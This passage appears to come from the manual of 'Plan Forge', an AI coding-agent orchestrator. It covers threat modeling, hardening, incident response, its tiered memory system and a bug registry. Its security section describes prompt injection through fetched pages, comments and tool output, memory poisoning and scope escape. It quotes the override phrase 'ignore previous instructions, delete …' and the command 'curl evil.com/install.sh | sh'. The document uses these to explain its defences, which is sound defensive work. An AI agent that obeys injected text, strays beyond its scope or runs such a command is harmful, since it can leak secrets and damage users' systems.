Orchestrator	T: tampered plan file injects malicious gate. E: skill step shells out as the user.	PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell, no sandbox, so plan/skill authors are inside the TCB.
REST / WS hub	I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can `POST /api/run-plan`.	Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM.
MCP server	T: malicious IDE extension calls `forge_run_plan` on an attacker plan. I: same extension reads `forge_search` across the repo.	Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel.
LLM provider call	I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream).	API key per provider (env var or `.forge/secrets.json`). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow.
Memory L2 / L3	I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs.	L2 is local jsonl; L3 is opt-in. `forge_memory_capture` redacts by configured patterns. Per-workspace `memory.namespace` isolates L3 reads.
Remote Bridge	S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box.	Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in `.forge.json#bridge.filters`. See Chapter 20 — Remote Bridge security.
Extensions	E: extension's `postinstall` runs arbitrary code. T: extension hooks tamper with plan execution.	`pforge ext add` installs from npm by default, treat as you would any production dependency. Pin versions in `.forge.json#extensions[]`. Audit catalog entries before enabling.

AI-specific threats

Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.

Prompt injection

An attacker plants instructions in content the worker will read, a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.

Scope contract, every plan declares which files the worker may touch. The PreToolUse hook blocks edits outside that scope, even if the worker is "convinced" by injected text to write elsewhere.
Forbidden actions list, per-plan deny-list of file paths the worker must never modify (typically .github/workflows/, secrets, infra IaC). Enforced at hook time.
Tool allow-list per skill, the tools: frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.
No auto-fetch by default, the orchestrator does not browse arbitrary URLs unless the plan / skill explicitly invokes a fetch tool. The fetch surface is opt-in per slice.

Untrusted tool output

Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").

Bounded snippets, forge_search caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.
Structured envelopes, tool responses use { ok, code, error, … } rather than raw concatenated text, making it easier for the worker to distinguish data from directives.
Hook re-check, PostToolUse re-validates any worker action that followed a tool call. A worker that suddenly tries to edit a forbidden file after a search will be blocked even if the search hit contained an injection.

Scope escape

The worker tries to do more than the slice was scoped for, bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.

Per-slice scope contract, explicit allow-list of files / patterns.
Forbidden actions, deny-list checked at hook time.
Drift detection, the forge_drift_report tool computes a drift score after each slice; the PostSlice hook warns when score drops below the configured threshold.
Review Gate (Session 3), an independent agent reviews the full diff against the scope contract before the plan is allowed to land.

Secret management

Plan Forge reads secrets from three sources, in precedence order:

Environment variables, XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, etc. The standard CI path.
.forge/secrets.json, gitignored local file, JSON key→value. The standard developer-machine path.
OAuth via gh auth login, the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.

Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.

If a secret was committed: rotate the credential first (revoke the leaked one, issue a new one), then rewrite history with git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters, rewriting history does not retroactively un-leak a credential that's been mirrored or fetched.

Supply chain

Plan Forge has three supply-chain entry points; each has explicit controls.

Entry point	Trust establishment	Update / verification
Plan Forge itself (template files, presets, prompts)	You cloned / installed from `github.com/srnichols/plan-forge`.	`pforge self-update` verifies the GitHub release tag; `pforge check` validates installed file checksums against the manifest.
Extensions (`extensions/catalog.json`)	Per-extension npm scope. Catalog lists publisher.	Pin version in `.forge.json#extensions[]`. Audit the package before `pforge ext add`. CI should fail on unaudited additions.
LLM providers	Provider TOS + your API key.	Out of scope for Plan Forge controls; managed by the provider.

Sandboxing & gate execution

Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade, the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.

What this means for threat modelers:

The orchestrator user is the TCB boundary. Anyone who can push a commit that lands a plan / skill / hook can run code on every developer machine that pulls and runs that plan.
This is the same threat model as CI/CD scripts, package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.
Mitigation is process: PR review on docs/plans/, .github/skills/, and .github/hooks/ by people who would catch curl evil.com/install.sh | sh in a regular pipeline file.

Two near-term defenses Plan Forge does provide:

Gate timeout, gates default to 120s; runaway commands are killed (statusReason: worker-signaled, see Appendix X — OS subprocess exits).
PreDeploy LiveGuard hook, runs forge_secret_scan + forge_env_diff before the deploy slice and blocks on severity ≥ high.

Hardening checklist

For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.

Control	Default	Production action
Hub bound to `127.0.0.1`	Yes	Confirm; never bind `0.0.0.0` without an auth proxy.
Run orchestrator as non-privileged user	User-dependent	Verify; never run as root / SYSTEM.
Secrets only in env or `.forge/secrets.json`	Yes	Audit repo with `forge_secret_scan`; rotate any historic leaks.
`.forge/secrets.json` gitignored	Yes (template)	Confirm `.gitignore` entry; CI should fail if absent.
PreToolUse hook installed	Yes (post-setup)	Verify `.github/hooks/PreToolUse.md` present; `pforge smith` reports it.
PreDeploy LiveGuard hook enabled	Configurable	Enable in `.forge.json#hooks.preDeploy` with severity threshold `high`.
Plan / skill / hook PR review required	User-dependent	Branch protection: require review on `docs/plans/`, `.github/skills/`, `.github/hooks/**`.
Extensions pinned by version	User-dependent	Pin in `.forge.json#extensions[].version`; CI fails on bare-name installs.
Remote Bridge HMAC verified	Per channel	Slack / Teams: built in. Generic webhooks: configure `bridge.<channel>.signingSecret`.
L3 memory opt-in only	Off	Leave off unless required; if on, configure per-workspace `memory.namespace` and redaction patterns.
Audit log retention configured	30 days	Adjust `.forge.json#audit.retentionDays` per compliance requirement (see Appendix N — Audit logging).
Air-gapped deployment validated	N/A	If required, follow Appendix N — Air-gapped deployment playbook.

Incident response

When something does go wrong, a forbidden file edited, a secret leaked, a worker shipped a destructive change, the LiveGuard surface is the front door:

Capture the incident, forge_incident_capture records the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured.
Pull the trajectory, .forge/runs/<runId>/trajectory.jsonl contains the full worker conversation, every tool call, every event. This is the forensic record.
Triage with the audit loop, /audit-loop classifies the finding into bug / spec / classifier lanes and files the appropriate issue.
Roll back, if the slice committed, use git revert on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.
Capture the lesson, the postmortem feeds back into PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under .github/instructions/.

The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.

Memory Architecture

Three tiers, one capture path. How Plan Forge remembers what it learned, across slices, across sessions, across plans.

New here? Start with this. When an AI agent ships a slice, it learns things, a tricky bug, a naming convention, a gotcha that took an hour to figure out. Most tools throw that away when the session ends. Plan Forge's memory system writes it down in three places at once so the next slice (or the next agent, or next month's session) starts from where the last one left off.

L1 (Hub), fast, in-process, like RAM. Powers the live dashboard.
L2 (Files), local .forge/*.jsonl files in your repo. Your project's permanent notebook.
L3 (OpenBrain), a shared semantic database. Searchable across projects, agents, and machines.

The same captureMemory() call writes to all three. If any tier fails, the others still succeed, nothing blocks your code.

And around those three tiers, v3.x added four pieces of craftsmanship: Hallmark stamps every record with a provenance envelope (hallmark/v1) so drift is detectable; Anvil hardens the L2→L3 doorway with a dead-letter queue and capability handshake so a network blip never loses a memory; Lattice sits alongside as a code-graph index the agent can query ("who calls this function?"); and forge_sync_memories pushes decisions and lessons up into Copilot's own Memory store so the next IDE session sees them automatically. The plain-English tour with numbers is in Chapter 22 — How the Shop Remembers.

This chapter consolidates the three-tier memory work in one place. The companion Chapter 22 — How the Shop Remembers tells the same story in plain English with the cost/quality numbers.

Looking for the v3.x upgrades (Hallmark, Anvil, Lattice, forge_sync_memories)? They're covered in plain English in the next chapter, Chapter 22 — How the Shop Remembers. That chapter explains what we layered on top of the L1/L2/L3 tiers described here, and shows the cost/quality numbers proving why a cheaper model can now do work that used to require the expensive one.

The Three Tiers

Figure 21-1. Three-tier memory capture flow

Plan Forge separates volatile working memory from durable project memory from cross-project semantic memory. Every captureMemory call writes to all three in a single best-effort pass, no tier blocks the others, no failure aborts the calling tool.

Tier	Storage	Lifetime	Read API	What v3 added
L1, Hub	`EventEmitter` in `hub.mjs` + `.forge/hub-events.jsonl`	Process lifetime + replay file	WebSocket subscribers, `forge_watch`	Unchanged. Same hub, same broadcast.
L2, Files	`.forge/*.jsonl` (memory-captures, gotchas, lessons, decisions, patterns…)	Repository lifetime	`forge_memory_report`, manual file reads	Hallmark stamps every new record (`_v:1`) so drift is detectable.
L3, OpenBrain	pgvector via `.forge/openbrain-queue.jsonl` drain	Cross-project, cross-session	`search_thoughts`, semantic recall	Anvil hardens the doorway (DLQ + capability handshake + boot drain).
+ Lattice	`.forge/lattice/{chunks,edges}.jsonl`	Repository lifetime (rebuildable)	`latticeQuery`, `latticeCallers`, `latticeBlast`	Parallel axis, a code-graph the agent queries alongside memory.
↑ Copilot Memory	Copilot's own Memory store (IDE)	Cross-session, IDE-wide	Copilot reads automatically	forge_sync_memories pushes decisions/lessons upward (additive, hash-deduped).

One picture, all the pieces. The three tiers didn't go away, we forged better tools around them. For the layered tower diagram showing exactly how Hallmark, Anvil, Lattice, and forge_sync_memories fit on top of L1/L2/L3, see Chapter 22 § How the New Pieces Fit the Old Tiers.

Unified Memory Across Agents

OpenBrain isn't just a per-session scratch pad, it's a shared memory layer that compounds across every AI agent, every IDE, and every session. When Claude captures a gotcha in Slice 2, Copilot reads it in Slice 5 without any manual handoff. When Cursor records a naming convention, Claude's next run already knows it.

OpenBrain cross-agent compounding: Claude, Cursor, and Copilot each write decisions via capture_thought and read prior context via search_thoughts. Knowledge compounds, each slice raises the quality floor for every future agent. — Figure 21-2. OpenBrain cross-agent compounding

How it works — 4 steps

Capture, any agent calls capture_thought({ content, project, source, type }) after a key decision. The record is scoped to your project and the originating slice path.
Fan-out, Plan Forge's L2 + L3 capture path appends the record locally (.forge/openbrain-queue.jsonl) and drains it to OpenBrain asynchronously.
Retrieve, at the start of any slice (or any session), agents call search_thoughts({ query, project, limit }) to surface relevant prior decisions before writing a single line of code.
Compound, each new capture raises the signal quality for every future agent. A convention captured in Phase 1 is still enforced in Phase 40, by a different agent, in a different IDE.

Agent integration table

Agent	Capture path	Retrieve path	Notes
Claude	`capture_thought` MCP tool	`search_thoughts` MCP tool	Full read/write; memory-preload event on plan start
Cursor	`capture_thought` MCP tool	`search_thoughts` MCP tool	Background agent and composer mode both supported
Copilot	`capture_thought` MCP tool	`search_thoughts` MCP tool	Lifecycle hooks (SessionStart) inject prior context automatically
Future agents	Any MCP client	Any MCP client	MCP-capable clients connect to the same store

See also: Multi-Agent → OpenBrain: The Connective Tissue, a deeper dive into how OpenBrain wires the 4-station pipeline together and what happens at each agent handoff.

Concepts in this section were first explored in the blog posts One Framework, Seven AI Agents and From WhatsApp to Shipped PR: The Unified System.

Capture Flow

One write, three destinations. The diagram below traces a single captureMemory({tool, type, body}) call from any tool through the dual-write fan-out:

┌──────────────────────────────────────────────────────────────────────┐
│  Any forge tool, watcher, hook, or skill                             │
│  └─► captureMemory({ tool, type, body, source })                     │
└──────────────────────────────────┬───────────────────────────────────┘
                                   │
        ┌──────────────────────────┼──────────────────────────┐
        ▼                          ▼                          ▼
┌──────────────────┐    ┌─────────────────────┐    ┌────────────────────┐
│  L1, Hub        │    │  L2, Files         │    │  L3, OpenBrain    │
│                  │    │                     │    │                    │
│ EventEmitter     │    │ Append _v:1 record  │    │ Append to          │
│   broadcast      │    │   to .forge/        │    │   openbrain-       │
│                  │    │   memory-captures   │    │   queue.jsonl      │
│ → WebSocket      │    │   .jsonl            │    │                    │
│   subscribers    │    │                     │    │ Drain worker:      │
│                  │    │ Tag-route to        │    │   batch → POST     │
│ → hub-events     │    │   gotchas.jsonl,    │    │   → pgvector       │
│   .jsonl replay  │    │   lessons.jsonl,    │    │                    │
│                  │    │   decisions.jsonl…  │    │ Failures → DLQ     │
│ Real-time UI     │    │                     │    │   .jsonl           │
└──────────────────┘    └─────────────────────┘    └────────────────────┘
                                                              │
                                                              ▼
                                                   ┌──────────────────────┐
                                                   │ search_thoughts /    │
                                                   │ buildPlanBootContext │
                                                   │ → preload on plan-   │
                                                   │   start (memory-     │
                                                   │   preload event)     │
                                                   └──────────────────────┘

Every step is wrapped in try/catch. A failed L3 enqueue never blocks the L2 file append; a corrupt L2 file never blocks the L1 broadcast. This is the dual-write pattern: best-effort fan-out with structured telemetry on each branch.

L1 — The Hub

The hub is a single EventEmitter instance in pforge-mcp/hub.mjs. Every event, slice start, model choice, tool result, memory capture, flows through it:

Subscribers, WebSocket clients (the dashboard), the watcher worker, the OpenBrain drain worker, anything listening for memory-captured
Replay file, every event also appends to .forge/hub-events.jsonl so a fresh dashboard can rebuild state on connect
Worker capability probe, workers announce which event types they handle so the hub can drop unhandled events early instead of fanning out garbage

L2 — The Files

Every memory file lives under .forge/ as line-delimited JSON. Each record carries a schema version field _v so the format can evolve without breaking older data:

File	Contents
memory-captures.jsonl	Raw capture log, every `captureMemory` call
gotchas.jsonl	Type-routed: `type: "gotcha"`
lessons.jsonl	Type-routed: `type: "lesson"`
decisions.jsonl	Type-routed: `type: "decision"`
patterns.jsonl	Type-routed: `type: "pattern"`
conventions.jsonl	Type-routed: `type: "convention"`
openbrain-queue.jsonl	Pending L3 deliveries (drain worker source)
openbrain-dlq.jsonl	Permanently failed L3 deliveries
hub-events.jsonl	L1 replay log

The Memory tab in the dashboard renders this exact set as a live KPI strip + per-file breakdown, see the dashboard chapter. The data comes from forge_memory_report, also exposed at GET /api/memory/report.

L3 — OpenBrain Bridge

OpenBrain is the cross-project semantic store (pgvector + thought metadata). Plan Forge never writes to it directly during a tool call, that would couple every tool's latency to the OpenBrain endpoint. Instead, the path goes through the Anvil boundary: a small piece of code that owns delivery, capability negotiation, and failure recovery so the calling tool only ever talks to a local queue.

captureMemory appends one line to .forge/openbrain-queue.jsonl (microseconds, local I/O)
The Anvil drain worker wakes on a timer or hub event, negotiates capabilities with the L3 endpoint, batches pending lines, and POSTs them to OpenBrain
Successes are removed from the queue. Failures retry up to N times, then land in openbrain-dlq.jsonl, the dead-letter queue that the next boot drains automatically
A drain-trend rolling window in forge_memory_report exposes pass/fail/deferred counts so the Memory tab can flag a stuck pipeline

OpenBrain not configured? The queue still fills harmlessly. captureMemory never fails because of L3. When you later set openbrain.endpoint in .forge.json, the next drain pass ships the backlog.

L3 → L1 Preload

When forge_run_plan emits run-started, the orchestrator calls buildPlanBootContext(plan, projectName) to derive a small set of semantic queries the agent should pre-fetch from L3 before slice 1:

plan-history hint, keyed off the plan name (plan Phase-1-AUTH), surfaces prior decisions on the same plan
slice-keyword hints, derived from slice titles via the keyword search map (e.g. "database" → database migration patterns, "api" → API endpoint design patterns), deduped and capped at 8

The hints are emitted as a memory-preload hub event. Any agent runtime listening (Copilot, Claude Code, Cursor) can resolve the hints via search_thoughts and seed its working context, eliminating the cold-start "what did we learn last time" gap.

Watcher → Memory

The file watcher (chapter 6 — Watcher tab) doesn't just emit FS events, it drives capture. When a file change matches a watcher rule, the watcher composes a buildWatcherSearchPrompt payload and pushes it through the same captureMemory path so the change becomes a first-class L2 record and an L3 query.

This closes the loop where edits made between plan slices used to vanish from memory. Now the watcher feeds L1/L2/L3 just like any tool would.

Source Attribution

Every capture carries a source field with a strict format: <tool> or <tool>/<subsystem>. validateSourceFormat rejects anything else. This means the Memory tab's "by tool" breakdown is always accurate, no untagged drift.

Examples

// Valid
"forge_run_plan"
"forge_run_plan/slice-executor"
"watcher/fs-rule"
"hook/pre-deploy"

// Rejected (logged, capture still proceeds, source replaced with "unknown")
"My Tool"
"forge_run_plan / slice-executor"   // spaces around slash
""

Migration: pforge migrate-memory

Schema changes (the _v field bumps) are handled by the migration switch in pforge.ps1 / pforge.sh:

Terminal

# Inspect what would migrate (no writes)
pforge migrate-memory --dry-run

# Apply: rewrites every .forge/*.jsonl record to the latest _v
pforge migrate-memory

# Migration is idempotent, running twice is a no-op

Originals are backed up to .forge/.migration-backup-<timestamp>/ before any rewrite.

Telemetry & Reporting

Three helpers in memory.mjs drive everything the dashboard shows:

buildCaptureTelemetry(), totals, deduped count, by-tool and by-type histograms (cosine-similarity dedup at write time)
buildCacheEntry() + isCacheEntryFresh(), search-result cache with TTL stamping (stampThoughtExpiry) and read-time filtering (filterUnexpiredThoughts)
buildMemoryReport(projectDir), assembles the full payload behind forge_memory_report / /api/memory/report: file inventory, version distribution, queue depth, drain trend, orphan detection

How the Shop Remembers

The plain-English tour of Plan Forge's upgraded memory system, and the reason a cheaper, faster model can now do work that used to require the expensive one.

New here? Start with this. The previous chapter (Memory Architecture) explains the three-tier plumbing (L1 hub, L2 files, L3 OpenBrain). This chapter explains what we added on top in plain language, the maker's mark on every record (Hallmark), the safer doorway to the shared brain (Anvil), the code-map that lets the agent ask "who calls this function?" (Lattice), and the bridge that hands all of it to Copilot's own memory (forge_sync_memories).

Still three tiers. L1/L2/L3 didn't go away. We forged better tools around them.
Still one capture call. Your code doesn't change. The shop just remembers more reliably now.
The payoff is measurable. Drift dropped 64% over 90 days. A 7-slice plan now executes for $0.07 on Sonnet alone, no Opus escalation.

What's in this chapter: a one-page mental model of the four new pieces, a day-in-the-life walkthrough of a slice, the cheaper/faster-model story with real numbers from this very repo, three commands you can run today, and where to look on the dashboard.

The Four New Pieces

Think of the forge shop. The L1/L2/L3 memory tiers are the workbench, the filing cabinet, and the library across town. They were already there. What we added is the craftsmanship around them:

Piece	The shop metaphor	What it actually does
Hallmark	The maker's mark stamped into the metal, proves who forged it, when, from what stock.	A small JSON envelope (`hallmark/v1`) attached to every memory record and artifact. Lets any tool ask "is this still the version I think it is?" and catch drift before it bites.
Anvil	The anvil where everything gets struck, solid, reliable, never drops the hammer.	The boundary code that delivers L2 records to OpenBrain (L3). Adds a dead-letter queue, a capability handshake, and a boot-time drain so a network blip never loses a memory.
Lattice	The map of the shop, every workbench, every tool, every chain pulley, indexed by where it sits.	A code-graph index over your repo. Splits source into semantic chunks, records who-calls-whom, and answers "show me everyone who calls `executeSlice`" in milliseconds.
forge_sync_memories	The dispatch rider that carries shop news to the wider guild.	A soft-sync that copies decisions/lessons/gotchas from `.forge/` into Copilot's own Memory store, so VS Code agents see them automatically next session.

Why "soft" sync? Copilot Memory is read-only-from-our-side. We can write, but we can't delete what the user has curated. So the sync is additive only, never destructive. Deduplication is handled by content hash, so re-running is safe.

A Day in the Life of a Slice

Here's what happens when pforge run-plan starts executing slice 3 of your plan. Every step touches at least one memory subsystem:

Preload, The orchestrator calls buildPlanBootContext and emits a memory-preload event with semantic queries derived from the slice's Scope Contract. The agent runtime (Copilot, Claude, Cursor) catches the event and runs search_thoughts against L3 + a latticeQuery against the code-graph. The agent now knows what prior slices learned and which files are relevant, before it reads a single line.
Execute, The agent edits files. When it hits a tricky pattern ("Windows shell quoting breaks grep -c when piped into a brace group"), it calls capture_thought with type gotcha. The capture path stamps the record with a fresh Hallmark envelope and writes to L1 (instant), L2 (durable), and queues it for L3.
Anvil delivery, A background drainer pulls from .forge/openbrain-queue.jsonl and pushes to OpenBrain. If OpenBrain is down or rejects the schema, the record lands in .forge/openbrain-dlq.jsonl instead of vanishing. The next boot drains the DLQ automatically.
Verify with Lattice, Before declaring the slice done, the agent runs latticeCallers on every function it touched. If the call graph shows an unexpected caller (a test it forgot about, or a sibling slice's import), the slice gate catches it. This is the step that prevents "I refactored X and didn't realize Y depended on it."
Sync out, At slice end, forge_sync_memories copies new decisions and lessons into Copilot Memory. Tomorrow's VS Code session sees them in the global memory pane without anyone running anything.

Why Cheaper, Faster Models Now Punch Above Their Weight

This is the part most teams don't expect.

The classic AI cost equation goes better model → fewer mistakes → less wasted spend. That's still true, but it ignores a second lever: context quality. A medium-tier model with the right context will routinely outperform a flagship model with vague context. Memory is context. And the memory upgrades make the context dramatically better.

Here's the receipt, measured on this repo over the last 90 days:

Metric	Before the upgrades	After (current)	What it means
Drift score	22	8	Architecture decay per session, lower is better. −64%.
Sonnet-4.6 success rate	~78% (estimated)	91% (332 / 365 slices)	Cheaper model now beats what Opus did a quarter ago.
Cost per slice	~$0.09	$0.04	Less re-reading, less back-and-forth, less escalation. ~55% cheaper.
Opus escalation rate	Multiple slices per plan	Zero on QA-class plans	The memory-QA plan executed 7 slices for $0.07 on Sonnet alone.
OpenBrain DLQ depth	N/A (would have dropped)	0 (Anvil catches all)	Zero memories lost to transient L3 failures.
Telemetry dedup rate	~0% (no dedup)	62.5% (10 of 16)	Hallmark's content hash collapses redundant writes.

How the four pieces compound

Hallmark means the agent can trust that "lesson learned in slice 2" is exactly what it was when written. No silent schema drift. The cheaper model doesn't waste tokens re-deriving facts it already has.
Anvil means recall is reliable. Pre-upgrade, a network hiccup could silently drop a memory and the next slice would re-learn the same gotcha. Now the DLQ catches it and the boot drainer replays it.
Lattice means the agent finds the right files without scanning the whole repo. "Who calls this function?" is a 50ms query instead of a 50-second grep-and-read. Fewer tokens, more accurate edits.
forge_sync_memories means knowledge crosses session boundaries automatically. The next session's cheaper model starts already knowing what the last session's expensive model figured out.

Put bluntly: the memory upgrades subsidize the model choice. You can pick Sonnet (or another mid-tier) and let memory carry the load that used to require Opus reasoning. The savings show up in the cost ledger; the quality shows up in the drift score.

The Phase-MEMORY-QA receipt. When we tested the memory upgrades themselves, the QA plan (7 slices, full E2E with mock OpenBrain, lattice callers, hallmark show/verify, backward-compat checks) ran for $0.07 total in ~51 minutes, 100% on Sonnet-4.6, no escalation, zero failed slices. The system QA'd itself with the very upgrades it was QA'ing, and did it for the price of a coffee. That's the loop closing.

Three Commands You Can Run Today

The memory subsystems are exposed through the pforge CLI and the MCP server. Here are the three you'll use most:

1. Search the code graph (Lattice)

# What does the agent see when it asks "where is snapshot restore handled?"
pforge lattice query "snapshot restore"

# Who calls this function?
pforge lattice callers executeSlice

# What does this function call?
pforge lattice callees attachSliceSnapshotRestore

2. Inspect the memory subsystem (any time)

# Health of every memory surface, L2 files, OpenBrain queue, DLQ, dedup rate, orphans
pforge memory report

# 90-day trend across drift / cost / models / incidents
pforge health-trend --days 90

3. Sync local decisions into Copilot Memory

# Push new decisions / lessons / gotchas into Copilot's own memory store.
# Safe to re-run, dedupes by content hash.
pforge sync-memories

# Dry-run preview (shows what would be written, writes nothing)
pforge sync-memories --dry-run

Where to Look on the Dashboard

The live dashboard (localhost:3100/dashboard) added an Anvil & Lattice tab when these subsystems shipped. From there you can see:

Anvil panel, current OpenBrain queue depth, DLQ depth, last-drain timestamp, drain success rate over time. A non-zero DLQ depth that doesn't clear within a drain pass is your only "go look at this" signal.
Lattice panel, index size (chunks, edges, files), last-rebuild timestamp, top-N hottest functions by caller count. Rebuild from here if you've made structural changes outside a plan run.
Hallmark coverage, percentage of L2 records carrying a _v stamp. Should sit at 100% for newly-written records; older records may show none.

How the New Pieces Fit the Old Tiers

To make sure the mental model holds, here's the same picture from Chapter 21 with the new pieces drawn in:

The memory stack, layered, not replaced

┌─────────────────────────────────────────────────────────────────┐
│  Copilot Memory (cross-session, IDE-wide)                       │
│       ▲                                                         │
│       │ forge_sync_memories  (additive, hash-deduped)           │
│  ┌────┴─────────────────────────────────────────────────────┐   │
│  │  L3, OpenBrain (pgvector, cross-project)                │   │
│  │       ▲                                                  │   │
│  │       │ Anvil  (DLQ + capability handshake + boot drain) │   │
│  │  ┌────┴─────────────────────────────────────────────┐    │   │
│  │  │  L2, .forge/*.jsonl   (Hallmark-stamped, _v:1)  │    │   │
│  │  │  L1, Hub (in-process, runId-scoped)             │    │   │
│  │  └──────────────────────────────────────────────────┘    │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Parallel axis (not a tier):                                    │
│    Lattice, .forge/lattice/{chunks,edges}.jsonl                │
│      (code-graph; queried alongside, not stacked on, memory)    │
└─────────────────────────────────────────────────────────────────┘

L1/L2/L3 are the same tiers. Hallmark adds a contract to what gets written. Anvil hardens the L2 → L3 doorway. forge_sync_memories pushes upward into Copilot. Lattice sits beside everything as a separate code-graph axis the agent queries the same way it queries memory.

The Bug Registry

Every bug, fingerprinted. Every fix, validated. The registry remembers.

Closed-loop tracker. Four tools form a closed loop: forge_bug_register → forge_bug_list → forge_bug_update_status → forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json.

Why a Registry?

Bugs found by the Tempering quorum, visual-diff scanners, or regression guard used to live in ad-hoc CHANGELOG entries and stray comments. They got fixed, forgotten, and then re-discovered three sprints later with different symptoms. The Bug Registry gives every scanner-discovered bug a durable record, fingerprinted, classified, tracked, and validated.

Fingerprint Dedup

When a bug is registered, the classifier computes a fingerprint from the scanner name + test name + assertion message + normalized stack trace. Re-registering the same fingerprint returns DUPLICATE_BUG with the existing bugId, no noise, no duplication.

The Status Lifecycle

Bug registry status machine: bugs start in 'open' (just registered, amber). Forward progression: open -> in-fix (work in progress) -> fixed (terminal green) after forge_bug_validate_fix re-runs the originating scanner and the gate passes. If the validation gate fails, the bug stays in-fix with an entry appended to bug.validationAttempts[]. From 'open' there are two side classifications to dashed gray terminal states: wont-fix and duplicate (links to original). Backward transitions from any terminal state are forbidden (red dashed line crossed out). Fingerprint dedupes on register; re-registering an existing fingerprint does not open a new bug ID.

Every bug moves through an explicit state machine:

Valid status transitions

open → in-fix → validating → fixed
             ↘ wont-fix
             ↘ duplicate
open → noise       (classifier ruled it a false positive)

Transitions are enforced by forge_bug_update_status. An illegal transition returns INVALID_TRANSITION.

Classification

The classifier inspects evidence (test name, assertion message, stack trace, flakiness history) and returns one of:

real-bug, evidence is consistent across scanners; record is persisted and captured to L3 memory.
flaky, evidence shows inconsistency; ignored unless confirmed across multiple runs.
noise, a triage classification applied by the audit classifier (e.g. "known false-positive pattern"). It is not a bug status. Bugs flagged as noise are typically resolved as wont-fix with the classification recorded in bug.triage.

Only real-bug outcomes write to .forge/bugs/ and fire tempering-bug-registered.

Closed-Loop Fix Validation

forge_bug_validate_fix re-runs the scanner that originally found the bug. On pass, the record moves to fixed, a tempering-bug-validated-fixed event fires, and, if OpenBrain is configured, an L3 thought is written so the next session knows what broke and what fixed it.

Scanner override. If the original scanner is no longer registered, pass scannerOverride to validate with an equivalent. The validation log preserves both scanner names for audit.

Where You See It

The dashboard's Triage tab shows open bugs by severity, with status chips and quick-transition buttons. The Watcher's Home chip includes an open bugs count. Cross-linked to incidents via forge_incident_capture.

Forge laboratory with brass test fixtures and glass vials each holding a glowing micro-blueprint, scenario replay against a dedicated fixture repo

Act IV, Learn · Chapter 24

The Testbed

A separate repo. A library of scenarios. End-to-end proof that the shop still works.

New here? Read this first. Unit tests check one function. Integration tests check one service. Neither tells you whether Plan Forge itself still works end-to-end on a real codebase, the way you'd actually use it. The Testbed solves that. It's a separate sandbox repo (a real .NET app called TimeTracker) that Plan Forge uses as a punching bag: replay a known scenario, see if the full pipeline produces a clean shippable outcome, record what broke.

Why a separate repo? So Plan Forge can break things, commit, revert, and try again, without ever touching your real project.
Why a library of scenarios? Each scenario is a JSON file describing a known regression (e.g. “agent dropped a test file last release— catch it”). Run them all and you know the forge still holds.
Who needs this? You don't, day-to-day. The Testbed is mainly for Plan Forge maintainers and platform teams who want regression coverage of the tool itself. Skip ahead unless that's you.

Tool: forge_testbed_run. Scenarios: docs/plans/testbed-scenarios/*.json. Findings: docs/plans/testbed-findings/*.json. Requires testbed.path in .forge.json.

Why a Separate Testbed?

Unit tests cover one module; integration tests cover one service. Neither tells you whether the full Plan-Forge pipeline still produces a clean, shippable outcome on a real repo under a real scenario. The Testbed does, it's a second, dedicated repository that Plan Forge treats as a read-write fixture, replays a scenario against, and records the defect log.

Learn-by-Doing: The Reference Testbed

The canonical reference testbed lives at srnichols/plan-forge-testbed. It's a real .NET 10 application, TimeTracker, a billable-hours tracker with Clients, Projects, Time Entries, Billing, Invoices, and Dashboard surfaces, used as the worked example throughout this manual.

If you're learning Plan-Forge by doing, work through it in this order:

Backend slices (docs/plans/Phase-1-CLIENTS-CRUD-PLAN.md), see how pforge run-plan drives a four-slice CRUD feature with [P] parallelism, [depends:], [scope:], and validation gates.
UI slices (docs/plans/Phase-2-WEB-UI-PLAN.md), Plan-Forge builds a Blazor Server + Microsoft Fluent UI front-end against the existing REST API. The plan demonstrates that pforge produces enterprise-grade UI: layered (page → service interface → repository, never DbContext in components), accessible (WCAG 2.1 AA), and tested (bUnit). This is the proof artifact for "pforge does not vibe-code."
Operational scenarios (docs/plans/testbed-scenarios/*.json), the synthetic regressions in the section below, replayed end-to-end via forge_testbed_run.

The .NET preset ships three artifacts that make Step 2 work on any consuming project, they're not testbed-specific:

